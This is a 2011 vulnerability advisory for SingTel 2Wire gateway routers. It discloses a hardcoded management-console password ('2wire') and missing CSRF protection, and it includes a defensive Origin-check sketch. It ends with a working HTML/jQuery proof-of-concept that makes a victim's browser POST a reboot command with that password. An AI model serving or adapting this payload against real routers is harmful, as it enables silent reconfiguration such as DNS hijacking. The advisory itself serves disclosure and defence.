
Singtel 2Wire Hardcoded Password / Cross Site Request Forgery

Posted Nov 1, 2011
Authored by Tan Sze Chuen

The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.

tags | exploit, csrf
advisories | CVE-2011-3682
SHA-256 | eb5b5217e2b643bfb0ab1be7a52fe6d7c9ec87512e821b9d6da3c54b7ae5e770

CVE-2011-3682: 2WIRE-SINGTEL 2701HGV-E/2700HGV-2/2700HG GATEWAY ROUTER MANAGEMENT AND DIAGNOSTIC CONSOLE VULNERABILITY 


1. BACKGROUND AND AFFECTED MODELS/FIRMWARE

SingTel provides customized versions of 2Wire gateway routers to its Internet service subscribers for the purpose of accessing the web.

Customized firmware at major version 5 (or below) contains a Management and Diagnostic Console (MDC) at http://192.168.1.254/mdc (when accessing from a device connected to the router) for SingTel engineers to perform setup and debugging procedures.

While the vulnerability is known to be patched in major version 6 (and above) of the firmware, it is likely that a high number of SingTel Internet service customers are still on the outdated firmware as there is no firmware upgrade procedure available to these subscribers.

2. VULNERABILITY

The MDC has its default password set as “2wire”. As opposed to the user panel at http://192.168.1.254, this password cannot be changed.

Although the site is only accessible through devices on the local subnet of the router, when combined with the lack of Cross-Site Request Forgery (CSRF) protection, the vulnerability allows attackers to alter the router’s settings for malicious purposes.

3. EXPLOIT

The exploit can be delivered through an HTML page served to the victim. The maliciously crafted page can then instruct the victim’s browser to send a POST request, meant to execute changes in the MDC, via XMLHttpRequest or a populated and automatically submitted form in JavaScript.

For instance, in the proof-of-concept, which reboots the router when served to a client connected to a vulnerable router, a form is POSTed to http://192.168.1.254/xslt with the following parameters:

PAGE = S01_POST,
view = XML,
THISPAGE = J21,
NEXTPAGE = J21_REBOOT,
PASSWORD = 2wire
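
The MDC accepted the request above no matter which page caused the browser to send it. As an added example (not part of the original advisory or of the vendor's firmware), this sketch shows the server-side Origin/Referer check whose absence the advisory describes; the function names, the trusted-origin set and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the console is only ever loaded from the router's own origin.
TRUSTED_ORIGINS = {"http://192.168.1.254"}
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(value):
    """Reduce an Origin or Referer value to scheme://host[:port], else None."""
    if not value or value == "null":
        return None
    try:
        parts = urlsplit(value)
        port = parts.port
    except ValueError:  # malformed port or host
        return None
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    host = parts.hostname
    if port not in (None, DEFAULT_PORTS[parts.scheme]):
        host = f"{host}:{port}"
    return f"{parts.scheme}://{host}"


def classify(method, headers):
    """Return (verdict, reason) for one request to the console."""
    if method.upper() not in STATE_CHANGING:
        return "allow", "not a state-changing method"
    lowered = {k.lower(): v for k, v in headers.items()}
    # If Origin is present it is authoritative; Referer is only a fallback.
    if "origin" in lowered:
        source = origin_of(lowered["origin"])
    else:
        source = origin_of(lowered.get("referer"))
    if source is None:
        return "reject", "no usable Origin or Referer"
    if source not in TRUSTED_ORIGINS:
        return "reject", f"cross-site request from {source}"
    return "allow", "same-origin"


# Constructed sample requests to /xslt (not captured traffic).
SAME_SITE = ("POST", {"Referer": "http://192.168.1.254/mdc"})
CROSS_SITE = ("POST", {"Origin": "http://untrusted.example"})
NO_SOURCE = ("POST", {"Content-Type": "application/x-www-form-urlencoded"})
```

A header check of this kind is one layer only; it does not replace a per-session anti-CSRF token or a password the owner can change.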

4. IMPACTS AND ADVISORY

A successful attack is unlikely to be noticed by the end user because a CSRF attack gives no warning, especially when performed through XMLHttpRequest. A likely exploitation would involve altering the victim router’s Domain Name System (DNS) records, enabling a Man-in-the-Middle (MITM) attack vector. This exposes the victim to severe Advanced Persistent Threats (APT).

Hence, SingTel and 2Wire are advised to push the updated firmware to their subscribers as soon as possible.

While the issue is pending resolution, SingTel Internet service customers with firmware major version 5 (and below) are advised to:

- Avoid visiting any website that is not previously trusted, especially web search results and links on social networking sites
- Pay increased attention to any anomalies in Internet service, such as substantial increase in page-load durations

5. DISCLOSURE AND NOTES

An attempt was made to contact SingTel about the vulnerability through SingCERT on 14 September 2011. While confirmation of the vulnerability has been received, no plan to fix it had been made known before the specified deadline of 31 October 2011.


TAN SZE CHUEN
Security Researcher
tan@szechuen.com (PGP key available)


Updates and Proof-of-Concept at http://blog.szechuen.com/cve-2011-3682

Proof-of-Concept:


<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
</head>
<body>
<script>
$.post("http://192.168.1.254/xslt", { PAGE: "S01_POST", view: "XML", THISPAGE: "J21", NEXTPAGE: "J21_REBOOT", PASSWORD: "2wire" } );
</script>
</body>
</html>
